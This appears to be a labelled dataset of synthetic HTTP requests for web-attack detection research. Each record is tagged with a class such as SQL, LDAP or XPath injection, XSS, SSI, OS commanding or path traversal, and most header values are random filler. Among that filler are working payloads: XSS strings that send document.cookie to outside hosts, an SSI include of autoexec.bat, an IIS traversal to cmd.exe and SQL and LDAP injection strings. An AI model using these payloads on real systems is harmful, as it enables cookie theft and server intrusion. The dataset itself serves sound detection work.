Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: sneew wtipeu1=scttED
Range: -549293,-6
Referer: /y19eEo3.doc
TE: trailers,gzip,trailers
Trailer: Proxy-Authorization
User-Agent: tohap6ymLgemtfre8noi
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7606x3250
Via: 2.1 www.tjhi2tya.shtml, HTTP/9.6 www.ansrcm.gif, HTTP/5.3 www.aa1s.jpeg:3220
Transfer-Encoding: deflate
Upgrade: nhS/5.5, hvnd/7.0, s5HomA/4.0, gonou5/9.7, epl/7.7
Warning: 482 65.238.5.101 "ois0cbedlccylrNmtRrg" "Sun, 04 Jun 06 04:15:57 GMT"
X-Forwarded-For: 129.108.57.155
X-Serial-Number: 5450783123933733
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36128
Start - Id: 38038
class: LdapInjection
GET /anonrjitttei/iTRkpE0UHRbN.h5bc/iuXg/d9lnBIt/nD1bqXIMKigERl-/cyO5euPVP/3JO8COVOmocha8QK-1/uyZAfP/bu4Fp1qsHKYa1VZKB/th4prJhd/dx8eZtrsqe/hiam.mspx?Cyisaej2js=n%3Boropositioncrs&oscemtrdogm6o=12&mtgltjN=erenqPste&1sEacletttH=t-n+roenetcatu%2Fio&1JaIsuUstmhcaa=tar&Anidropu2odRo=b+is1&tju=7rey&jirnt=en%29%28%26%28objectClass+++%3D++++e5a*%29&isItna7dt=h4+%3B3j%2Bpasswdo%5Du%3E HTTP/1.1
Host: www.sad9.biz
Connection: fttshrwb
Accept: */*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: ayuaRt-a, ca4qelq-sro;q=0.7, gnR3rso-u96nF, nwe-ems7ice, 4da-reh;q=0.8
Cache-Control: only-if-cached
Client-ip: 132.58.25.160
Cookie: ZGQKaFS=eiE]pka2 o;eoIseAyde2=neenn;s6dsontutlt=kC.h.CeBYNrE;oyddznteihos=gfetsybieltrise;ioyeehNsMsqenbf=482725
Cookie2: $Version="18"
Date: Wed, 12 Aug 09 15:47:21 CET
ETag: W/"5STQALlxr0GBlGNwgc"
Expect: 100-continue
From: deigiel@Ostrbaef.it
If-Modified-Since: Tue, 15 Sep 09 20:04:22 CET
If-Unmodified-Since: Tue, 13 Oct 09 03:34:09 CET
If-Match: "JgvRbWckZE@t5A749rg2"
If-None-Match: *
If-Range: "kwWSFsoczEiUFRP5kPO0"
Max-Forwards: 69
MIME-Version: 8.8
Pragma: dhaqfhe='c'
Proxy-Authorization: NTLM eW9hQm41aGRzYkZwdG9yc3Roc2Ftd3BrYXdySTR4aGFt
Authorization: of2es dbq0td=t9rej
Range: 60078-9
Referer: /lhai/w8ae/eutmazti.jpg
TE: chunked;q=0.1,trailers
Trailer: Cache-Control
User-Agent: Mozilla/6.4 (compatible; Konqueror/0.5; Windows NT; e5gnnnl)
UA-CPU: MIPS
UA-Disp: 879,787,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 427x816
Via: 2.3 www.sr9aepne.shtml, FTP/1.8 245.214.53.113, 5.8 25.40.215.110
Transfer-Encoding: deflate
Upgrade: sok/2.9, aiedsC/6.4, uph/8.9
Warning: 864 185.80.26.144 "Nciqesnma5Srctnr" "Wed, 25 Nov 09 18:45:33 UTC"
X-Forwarded-For: 212.17.65.81
X-Serial-Number: 94095568311644
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38038
Start - Id: 37094
class: LdapInjection
GET /s9de666/ei/nonIha1/ttumdh/Vsreplacec28/mJnLe-q/pts0L9D13bBhtc/mxJQb.0YD_/nRt_xopGN/eoftvnenE50e/3yz0ksBSCoptGc@/dY6FxTMDUkoa31e.cfm?PtqtelnetKinweQ=mCS0MdDEUw&09G_Ueval8J%u=%29++%28+++%7C+%28displayName%3Dhad*%29++++%28name++%3D+had*+++%29%28++mail%3Dhad*%29&amt=t+h&2706jZxconnect8xE=6idt5ensoa5dtNduu&i4oienoS=c8O&atlsemwgeiJ=or%26utrurtr&oalyttghW0tr7=wer1dzemvaainebd6p&cn=5 HTTP/1.1
Host: www.lghsaa7i.com:2
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: ihte-jssHnea;q=0.9, 1-egO, 5ulzoM6-nceter, lpi-csv;q=0.7, desse-bl
Cache-Control: max-age=9
Client-ip: 237.22.129.42
Cookie: wrc=0d|h5intteasystemusipassthru7;oghaatie7bo=u_Q0cOC;ekcqxwyXFa6x=9Rhpw6iSowh/ngeayr
Cookie2: $Version="42"
Date: Sun, 09 Jan 05 19:13:37 GMT
ETag: W/"ex2f5I_0004_3pr7.R--"
Expect: 100-continue
From: isenqanI@dizsiba.uk
If-Modified-Since: Sat, 08 Oct 05 07:10:40 GMT
If-Unmodified-Since: Mon, 25 May 09 18:29:07 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 556
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM ZDlvc3NhZWFjZXltMHRuaW1qYm9lQURIbmR0b0EyeTRMbQ==
Authorization: Digest uri=http://www.ieofy.fr/etne9/oL1A/s0oe.cfm
Range: 8-29969,-67,432-912142
Referer: /edsdea/nant/xrtati/dYKd.php4
TE: trailers,chunked
Trailer: Max-Forwards
User-Agent: disllven/6.8.4
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7857x018
Via: HTTP/1.1 www.vztiai2.png:67, 5.9 www.rrTtuweh.shtml:0
Transfer-Encoding: deflate
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 620 www.gRricn.htm "alTyesjrtent3" 
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 6212465353435599462
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37094
Start - Id: 38087
class: LdapInjection
GET /nMosaaal9f/rIrlhotSxtlnlde/m3Nbt1BQjDId3DVhy/unTicnns/eyGg0t/a422X@fDZDXj/TrEV/duTXxgnNJqC9hs4XcDZP/uL/.PqeHwp-dNm/FGbqO2JydhaSxp_%u.shtml?5group byUN3LDn@.=3812&E4=1120336&4jE6_bTMnetcatMT=pr-7TfVWUs_b&rr7i4s3Xortee=9383&stnaieeaz9ynem=eP6DiBsISJf&V8ySBmochal=a0sG6x%40M&dYotP85ldias=1%3F&p2n8E=%29+%28%7C%28cn%3D*o++%27brien*+%29%28mail+%3D*o%27brien*++%29&8aaozEMZooakeh7=aerCdx&schehsiaiTe=2 HTTP/1.0
Host: 244.55.112.112
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.8, identity
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 111.152.191.252
Cookie: ajaie8didflf0tl=Tev5e;dow=KsO;8ggnet1Dcnecfc=36457335
Cookie2: $Version="74"
Date: Sun, 31 Jan 10 06:38:33 GMT
ETag: W/"WFlRn2_F0qiz2qXuNMV"
Expect: 100-continue
From: 7ptrd@s3eas2sne.fr
If-Modified-Since: Mon, 31 Dec 07 21:40:35 UTC
If-Unmodified-Since: Sat, 05 Jun 04 20:20:03 UTC
If-Match: *
If-None-Match: "NtTBkiQr7.qr_qJGPp"
If-Range: *
Max-Forwards: 26
MIME-Version: 7.3
Pragma: Uj=qpsp
Proxy-Authorization: Basic VDQ5QTpieGVt
Authorization: Digest algorithm=MD5-sess
Range: 77-,76-
Referer: http://2ghdo.com/Greja.txt
TE: trailers,trailers
Trailer: Pragma
User-Agent: sESmehqe (l4Z-5T)
UA-CPU: MIPS
UA-Disp: 119,1491,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3700x2595
Via: 1.0 81.223.53.197, HTTP/5.2 www.IeeEe.jpg, HTTP/6.6 98.168.5.53
Transfer-Encoding: 4nis; ohirt=itsrh2
Upgrade: sS7i/3.2, haaoxa/5.4, fair/8.2
Warning: 219 www.3ozcshh.html "dmg8ee" "Tue, 02 Sep 08 10:15:09 GMT"
X-Forwarded-For: 152.42.151.28
X-Serial-Number: 814494240740
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38087
Start - Id: 42436
class: SqlInjection
GET /w5QJSl-xxqZeD/e-EM4qeCCkJczTnt9N/ealh9OaeCax21uisdhit/hlaicU26yn@VZJApt1Ga/pNGwindow.openaftpg5Z/ePo2KnRVo7/S6orJwvnc1HI9HA/ouhepm/rQaDh/4swe63lZHndhNnIeCe/uYLQN8A.png?93Vy8Hw=1922&yt=t&teoeSwChTtc=auujQQ.&otehcen=select++snirtaa++++from+ALL_USERS&5nFlUT_w2=30941 HTTP/1.0
Host: 200.12.56.93
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ottiat-3ece, Resatn1h-t;q=0.4, eca-ni7ee;q=0.4, t-r;q=0.8
Cache-Control: no-transform
Client-ip: 240.161.64.35
Cookie: .ghtaccesloK=024687350
Cookie2: $Version="2"
Date: Tue, 19 Aug 08 09:01:00 CET
ETag: "ZSerFm.z9rWfs9@A7MH."
Expect: ctja
From: ein6@dloaflHo.biz
If-Modified-Since: Fri, 07 Apr 06 17:21:38 GMT
If-Unmodified-Since: Thu, 30 Jun 05 09:11:11 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 12 Oct 06 12:44:22 UTC
Max-Forwards: 150
MIME-Version: 0.6
Pragma: leomi='oihlabna'
Proxy-Authorization: Basic aHdkZWQ6dDVtbjYzb1M=
Authorization: Basic ZXllaVRoczY6bHNvM2k=
Range: 53-,-2932
Referer: http://www.thonua.de/yjtlsihY/insnht/eNtrE/ancun/rhnj.php
TE: deflate;q=0.8
Trailer: From
User-Agent: tmUO18 http://www.aEeambr.net
UA-CPU: PowerPC
UA-Disp: 257,8628,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 028x6235
Via: 5.1 www.foetac.png, HTTP/6.6 109.95.108.194:0308
Transfer-Encoding: deflate
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 292 www.ev6O.jpeg "hnt5llemsftyrettr" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42436
Start - Id: 46690
class: XSS
GET /hQKZ/3RYq/nWWu-Rw8Vs/l23o1L8g/zcNeeeIE9y3g.shtml?mh0aavc=rmJdioassNzhoeher&yA=iratdopezr&nEFu2e8ezl=orl&de9fdea=mg&Tvh=tqn4unsi%3F HTTP/1.0
Host: www.uslapo.de
Connection: keep-alive
Accept: text/xml, audio/basic;q=0.1, text/plain;q=0.8
Accept-Charset: iso-8859-4;q=0.8, x-mac-cyrillic, iso-8859-1;q=0.8, windows-1250;q=0.2, iso-8859-7
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.5
Cache-Control: no-transform
Cookie: jbS3BcE.0a=<img   src = "     javascript:   [alert    ('7ce0te');]     "   >;n2yiieEureei=25885;naI1aMshir=bD
Cookie2: $Version="2"
Date: Fri, 17 Jul 09 03:06:03 UTC
Expect: 100-continue
If-Unmodified-Since: Sat, 02 Aug 08 18:39:53 GMT
If-Match: *
If-Range: "1iYJyAhvbzf0zndzI."
Max-Forwards: 306
Pragma: aMenw6w=xuy
Authorization: n2Lpem h3z7ud=cozyzite
Referer: http://nhkemd2.com/nublpho/eahn/l5al7l/xehtyOy/f8rtez.rar
TE: deflate
User-Agent: pONoHDL http://www.sSIt.gov
UA-Color: color8
UA-Pixels: 550x707
Via: ile/9.3 www.edesdior.css, HTTP/5.2 51.79.151.155:73253
Transfer-Encoding: identity
Warning: 104 www.tos7l9.gif "agNmpea" "Tue, 01 Jun 04 12:05:40 GMT"
----: ------------------------------------------

null

End - Id: 46690
Start - Id: 47497
class: XSS
GET /7tzlsesaARb9nyoneo.exe?idHnsh=kenn205oranDrcm&cnEnlluuhide=3&atiSw1dttoy0qe=%3Cbody+onload+%3D%22+%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.rileic.com%2Fcgi-bin%2Ftiermara.cgi%27%2Bdocument.cookie%29%3B%5D++++%22+%3E&rstedba=iK3sYQBMA&Tsayadeeeowern=cWZnADYWm&ierl=f+e9&te=smoruNljCdeauenl HTTP/1.1
Host: 32.67.52.85
Connection: keep-alive
Accept: video/*;q=0.3, application/*
Accept-Charset: koi8;q=0.6
Accept-Encoding: gzip, gzip, deflate, compress, deflate;q=0.8
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 229.228.100.156
Cookie: emahgsdcedinet=ohemi;nzehhatapl=305098573
Cookie2: $Version="037"
Date: Fri, 07 Sep 07 12:23:36 GMT
ETag: W/"mH_4FRfD3DPEqxMbE"
Expect: 100-continue
From: hD4h@iejie.gov
If-Modified-Since: Fri, 21 Jan 05 04:30:17 GMT
If-Unmodified-Since: Sun, 10 Dec 06 23:13:07 CET
If-Match: *
If-None-Match: "-d7mEccy.PWPKU7xY"
If-Range: Thu, 24 Sep 09 10:13:13 UTC
Max-Forwards: 34
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic aXJvZXA6Y3NlYWFyYg==
Authorization: NTLM aWVxcDJhdDdkc2RhZWVkaFM3YTBkeW5sZmc5bG1wcHl1RWlvZW9tc25sZQ==
Range: 9183-933,-0
Referer: /r2NEnuo/1eat/lsyjh.mp3
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/7.7 (Windows; U; Win98 1.6; fs-Gn; rv:0.9.7) Gecko/21668083
UA-CPU: x86
UA-Disp: 076,499,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7841x155
Via: fnAhun/6.5 www.eh33mol.gif, HTTP/2.4 www.hI34iv.png, 0.2 171.144.220.41
Transfer-Encoding: identity
Upgrade: mrsd/9.5, owur/3.3
Warning: 771 227.153.234.137 "zyfairhnrumgfhbhiV" "Thu, 01 Jan 09 02:19:05 CET"
X-Forwarded-For: 121.171.235.172
X-Serial-Number: 48112496441051
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47497
Start - Id: 40703
class: SSI
PUT /n6SYhYhBT6@/ae/mulTat/b5/IbsHnQEqREY/nv3t4TWD/J15w6fBfDdeletem/iMjH9Y1VX/xacie.shtml? HTTP/1.0
Content-Length: 29
Content-Language: 2immoq
Content-Encoding: deflate
Content-Location: http://www.ptaws.it/toampuC/1Dnsecy/ue2elt/hdso1a.tiff
Content-MD5: Z2lpZ3RtemxJRTNvZm5nbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Aug 05 06:21:42 GMT
Last-Modified: Sun, 12 Oct 08 05:51:23 UTC
Host: 64.254.67.253
Connection: keep-alive
Accept: text/*, audio/x-wav;q=0.5, video/mpeg
Accept-Charset: x-mac-chinesesimp, macintosh
Accept-Encoding: <!--  #include virtual="d:\windows\autoexec.bat"  -->
Accept-Language: *
Cache-Control: oOfmnmht=aCt
Cookie: srjeo=4hhZsm6cdfc\t3o;c5al5rhh6wn=nuobject7u0Oe9aha;oVcyiirn9Rdr=pBNF-80N;kUmY@=nFX2Sm2h_53u
Date: Tue, 09 Sep 08 13:27:07 CET
Expect: 100-continue
If-Modified-Since: Thu, 12 Aug 04 06:45:31 UTC
If-Unmodified-Since: Wed, 20 Oct 04 16:11:48 GMT
If-Range: *
Max-Forwards: 8726
Pragma: no-cache
Proxy-Authorization: Digest username="whvbx"
Authorization: Basic ZXdpbzpqc3JhMnM=
Range: 89435-
Referer: http://www.oe41nDyD.org/bdaywgam.js
TE: trailers,trailers
User-Agent: Mozilla/5.5 (compatible; Konqueror/3.7; Solaris; tthehe)
UA-CPU: 68000
UA-Color: color32
Via: 1Hnn/7.5 34.146.29.226, HTTP/6.3 87.118.188.219, 8.4 www.n0ir8dsk.png
Transfer-Encoding: identity
Upgrade: tyr/4.2, rsAlr/6.2
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eatfp=veeheut1ei&om=eXjvtdz5C

End - Id: 40703
Start - Id: 35676
class: XPathInjection
GET /taER0AEZPuMQqV5syG2/VeovJI_s27iCX.js?428cnvdnatHeOil=ea6%27++++or+++%28i+++%3C+++++count%28sa%2Fchild%3A%3Atext%28%29%29+and+++j++++%3C++++count%28ye4aG%2Fchild%3A%3Acomment%28%29%29++and+++++k+++++%3C++++count%28tneTu%2Fchild%3A%3A*%29++%29+++or+++%27edq%27+++%3D+++%27++hayeiLn%27+++++or&1odarjix=9XOgv3u HTTP/1.1
Host: 92.250.24.243
Connection: close
Accept: text/xml
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: q1frns-uoagia;q=0.7
Cache-Control: max-stale
Client-ip: 68.97.141.43
Cookie: noobvtep3=h7zURB0Z;Ropmnwhsa=lnp04YSI;3yramcev=acri;wXDGDunion00=ii3d+stautoexecte;-faRIv= nr;teecjsyaol=11501
Cookie2: $Version="063"
Date: Mon, 04 Jan 10 14:51:27 CET
ETag: "Llo6Q0Dtf73F-LBFZWsG"
Expect: e8c6tipe
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Wed, 05 Oct 05 16:51:04 UTC
If-Unmodified-Since: Sun, 31 Oct 04 12:22:57 UTC
If-Match: *
If-None-Match: "yNXXU1an9a@WaKK"
If-Range: "thW9WVWJBobfbsOK"
Max-Forwards: 780
MIME-Version: 5.4
Pragma: Ucruem='o'
Proxy-Authorization: NTLM cnFqYVJvMHJvbzRlY25hYW5hemk5ZGFyZXRpdGV0ZnN0QXhnNW9oZWh1ZWFuaHRl
Authorization: oErsen llotus=halypa
Range: -5103
Referer: /LOoT/oartgnL/RShre.cgi
TE: chunked,trailers,deflate;q=0.4
Trailer: From
User-Agent: Mozilla/7.3 (X11; U; Solaris 6.8; lt-sr; rv:0.8.1) Gecko/34240063
UA-CPU: x86
UA-Disp: 466,505,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2667x788
Via: HTTP/1.0 www.u0ty8a.jpg:87944, 7.0 www.tehyt.css:66324, FTP/3.8 www.nedt7eeS.shtml
Transfer-Encoding: o7mum
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 250 95.244.16.100 "anwrZ" 
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 24734
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35676
Start - Id: 43691
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 117.189.78.68:80
Connection: close
Accept: image/jpeg;q=0.1, video/*;q=0.2
Accept-Charset: big5, iso-8859-5, x-mac-hebrew
Accept-Encoding: gzip;q=0.6, compress, compress, compress;q=0.3
Accept-Language: elamqF-lMeolola;q=0.8, t-y6oiRe
Cache-Control: max-age=0879
Client-ip: 224.58.43.189
Cookie: pqtqeOtm5u1fta=438934;frctfnL=o\5iyun;w;stuesheGv8oa=74746;rdmto=i;Lmvo=ageh5tpcn
Cookie2: $Version="4"
Date: Tue, 23 Feb 10 12:40:15 GMT
ETag: W/"PNrp5mVZP0rueEpCM."
Expect: 100-continue
From: o68nO@tetn70i.cz
If-Modified-Since: Tue, 19 Sep 06 17:53:15 CET
If-Unmodified-Since: Sun, 01 Oct 06 06:42:34 GMT
If-Match: "mJJG3z@q5TiwxT8jCP@"
If-None-Match: "lLIYoJsDh4TO26qq"
If-Range: "Q2gRfeoVn9h94TAk2mu"
Max-Forwards: 6226
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: csat8 fle0=tohc
Authorization: Digest algorithm=MD5
Range: 0932-655,7-822597,-7
Referer: http://www.so0A.com/swe1r/ethcb/abaate/uaren.shtml
TE: trailers,deflate;q=0.7
User-Agent: eaulCewX (yMhb5Oe; su2a@HcfrK; eNoXS.Nv; nVMnIebJ)
UA-CPU: StrongARM
UA-Disp: 0760,6921,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 827x275
Via: 6.3 72.169.10.81:1, stlo/3.5 50.86.7.132:944, FTP/1.8 www.ytddYOt.tiff
Transfer-Encoding: identity
Upgrade: as8/8.8, mad/2.6, pEyuj/1.9, o5a8/8.7, ewmi2m/5.2
Warning: 965 www.lhcrhue2.jpeg "khnjidedehslccnwsp" "Tue, 25 Jan 05 20:48:31 UTC"
X-Forwarded-For: 51.55.191.62
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 43691
Start - Id: 47134
class: XSS
GET /pt/oMKr/M5uorwsvczees7stRi/u.gdrN1oBORX5i/sZSB01/6DgyBKLM/k0t79wvihhBltreie/r2TzdL6siinhrsdou/ahen/BicPXZJaYprT/sChiaskFr/7Q1JB5l.html?fb=3&sstainUdeii2w=%5B%5CxC0%5D%5B%5CxBC%5Dscript++%3E%5Bwindow.open%28%27http%3A%2F%2F166.140.86.240%2Fch.aspx%27%2Bdocument.cookie%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript++%3E&telta=048696&te4foiqXpe=24949 HTTP/1.1
Host: 43.222.65.166
Connection: keep-alive
Accept: text/xml;q=0.6, application/*
Accept-Charset: koi8;q=0.0, utf-7;q=0.5
Accept-Encoding: 
Accept-Language: iionM-uut3ic, j-mk9tt4hp
Cache-Control: no-cache
Client-ip: 209.25.156.191
Cookie: thaa4vt7t7Olt=G=vb
Cookie2: $Version="12"
Date: Sun, 08 Feb 09 04:01:39 GMT
ETag: "LcSIlirSRVReo07k6"
Expect: dwai6Nt=atnc48
From: SntgwR@dDthvRF0b.it
If-Modified-Since: Fri, 14 Nov 08 07:26:28 UTC
If-Unmodified-Since: Fri, 25 Apr 08 02:49:02 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 29 Apr 10 13:06:36 UTC
Max-Forwards: 791
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM aXU0YnduSWdoNzllTHA2dzdoNGhvYmlxbFNzbm5oZWNhYWZoN2lzbmVF
Range: -63707,310050-133
Referer: http://haoegh.ch/a6ej/dtddbt/ukzfOnd.sh
TE: chunked
Trailer: TE
User-Agent: xtipa/7.9.0.3.8
UA-CPU: 68000
UA-Disp: 9389,112,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7372x166
Via: HTTP/8.2 142.52.32.41
Transfer-Encoding: identity
Upgrade: eixwry/2.2, nei/4.2, gHU/2.1
Warning: 339 51.64.209.7 "6Kirtt2tetFxoo" "Fri, 17 Oct 08 02:00:42 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 42655
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47134
Start - Id: 48430
class: XPathInjection
GET /nimvesgI2/m3GrhreplaceURpand/ecxGiM2h/lln/eetirIwgdciRlnbymr5/HDo/usrMopennOX27Hue7H/nZP02XSUq40X4HB/wWeu7.jpeg?s2k7lTj7Elsfns=di&h1uneeoint=pr+u4uwseiNtrdf&uhslh=jplttnsth6iho&Womhter1u1=bB6vc HTTP/1.0
Host: 11.41.80.239
Connection: neosM
Accept: video/*, image/*;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: compress;q=0.9, compress;q=0.9, compress, deflate;q=0.5
Accept-Language: Ak-iastlt;q=0.3, 2l-eild;q=0.1
Cache-Control: cd0natbo=sce
Client-ip: 161.32.126.160
Cookie: 7xzmeOfAwinnt=rrIxs;yr6gnedprswws=iu' or path/child::node()[position()=N]   or     'ee'   =  ';Ne=nasuqlyeeeCt;eygq8haa=16719355;8zzijthDn=bjd9nbto(h
Cookie2: $Version="29"
Date: Tue, 22 Nov 05 22:53:07 GMT
ETag: W/"u4Uzi4Ou4UqKUGiydh"
Expect: b9rifpe
From: Jhte@ioNeu6fte.fr
If-Modified-Since: Fri, 08 Oct 04 17:56:24 UTC
If-Unmodified-Since: Tue, 18 Oct 05 01:18:30 GMT
If-Match: "hon@IktzXoUhm@xsm"
If-None-Match: "5nbAxZIKZa2wmxpB."
If-Range: "wxbkgEhSJh17u9Yd5wh"
Max-Forwards: 32
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic aHdldXU6aDdkZXJt
Authorization: Digest uri=http://lqlr.fr/dntaey/dLnc/w5sLyw.asp
Range: -88510,-99
Referer: /eaxla8/hsluih/9ozotpK/QlngOnc/YTuo.wmn
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/8.1 (Windows; U; WinNT 3.0; nc-i9; rv:5.9.9) Gecko/08197394
UA-CPU: MIPS
UA-Disp: 842,949,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 784x619
Via: 4.6 10.62.226.163, 7.7 www.nedrK.jpeg
Transfer-Encoding: gzip
Upgrade: 7eaeH/4.4
Warning: 484 www.gtio.jpg "pu9t4b7o63nafyaem" 
X-Forwarded-For: 110.20.49.195
X-Serial-Number: 2509612458
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48430
Start - Id: 35360
class: SqlInjection
GET /AutAbngtl6as6tai/tEpdl/seg4srwstbe7adyslry/rOZfV-_XM5./dEmzqb/oBu.dll?hdaay4oi=ueph7a7Auk0jhn&haeuntirares=imboot.iniie&oij=e%3Ce%26reiyiedvC&sbqA=%27++OR+++++%27cbuturto%27++%3E+++%27S&YORUYwindow.openmw3-Vr=2&deiiegl=81C-pk&scnetmt1tw7eihe=8&Tipassthru5tmpOrfbM=S3ktsio2h&eN0Nc3=7&MexecRPN_lhttps=074975416 HTTP/1.1
Host: www.4hnIajtd.ch
Connection: close
Accept: image/*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: 6n-ea
Cache-Control: no-transform
Client-ip: 254.147.83.204
Cookie: 3woNlejepd=llurs;Hfnna8ee=j;rhy
Cookie2: $Version="194"
Date: Thu, 22 Oct 09 08:14:03 UTC
ETag: W/"7KzDRrOZR0LNGoB"
Expect: 100-continue
From: ualuoer@tmohteyrt.be
If-Modified-Since: Sun, 04 Jul 04 02:17:10 UTC
If-Unmodified-Since: Thu, 13 Jan 05 20:58:48 CET
If-Match: *
If-None-Match: "ueeJa0Dl8Tb3UVx"
If-Range: Tue, 10 Jul 07 16:52:19 GMT
Max-Forwards: 39
MIME-Version: 6.8
Pragma: ot0piek='Drye'
Proxy-Authorization: NTLM VGVkNHBpZjUzc3l6dm5wZ3RtdG5kb2FoM2RuZW5vdTJhc3Rvb2ZycHNoc2g=
Authorization: tatos 8nlSpeje=8eoUwrs
Range: 56564-256483,76-,27160-85
Referer: http://synFaE.fr/8see41r/ceewU.css
TE: deflate;q=0.7,trailers
Trailer: Host
User-Agent: Mozilla/8.5 (Machintosh; U; PPC 8.7; on-7i; rv:1.0.3) Gecko/12317270
UA-CPU: 68000
UA-Disp: 3189,7325,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 739x825
Via: 1.0 www.aOo5t6.html, 4.1 www.nNIenmt.jpeg
Transfer-Encoding: gzip
Upgrade: gerh/9.6
Warning: 445 236.92.54.164 "ihposkezh6eanidatou6" "Sun, 23 Apr 06 11:05:08 UTC"
X-Forwarded-For: 4.168.32.214
X-Serial-Number: 06713
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35360
Start - Id: 44928
class: PathTransversal
GET /tt_m3dn9Bs/hvFP_fcAMQNK/eiiieeztrtoo9omtetn/@TDX/uxLzNgGHeCugnmVHCy7e/EAetcULJbK/aB/Twp-adminb/sAYcvGeOqaWQK/ahai9e/mmMZ9pFzptZ.gif?3frnad=r3eo&rpTQeemO=dzwr&lsjP37NGpdk=6pi&eoHxdeesamjw=nbicoeglUeNlslbSr&etmesbaCnOf=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&gdteivOoearXTga=2517365&rr9a4ml=s5sn8fe&rbtdoiHeleYo=7&ttrwls1xmdyhi4r=kiintxtgedwytea&aeFwtotsj=17 HTTP/1.1
Host: 124.254.210.5
Connection: agdq
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.9
Accept-Language: elane-tD0whtn, oeso-nomair, w-eceA, tal-B7, e7dHf-0iouag;q=0.0
Cache-Control: only-if-cached
Client-ip: 210.224.126.37
Cookie: 4Nolinkta0aWSplocationinsert=hrffk0A
Cookie2: $Version="10"
Date: Fri, 04 Jul 08 01:31:38 UTC
ETag: "FQ4mSj-450Ugdqc720s"
Expect: 100-continue
From: erlpd29@hbwsenumTc.de
If-Modified-Since: Wed, 07 Jun 06 21:27:21 UTC
If-Unmodified-Since: Sat, 27 Jun 09 17:14:53 GMT
If-Match: "bYmRxm3JoHIIpH8Cv3"
If-None-Match: *
If-Range: Sun, 25 Oct 09 07:04:03 CET
Max-Forwards: 6672
MIME-Version: 6.2
Pragma: 3iys5e='4jtl5'
Proxy-Authorization: Digest response="98F2FadAed0C8DFfeDEa1A54Dbbba32e"
Authorization: NTLM dGFlZWVIYmplZXJuZW9ob25lZHRlb3JoaXRydXdvQTdhdGFXMXRuaW5qYVM=
Range: -044,-5960,-6
Referer: http://naeiloks.fr/amijfily/rarel.sh
TE: chunked;q=0.4,gzip;q=0.0,gzip
Trailer: Cache-Control
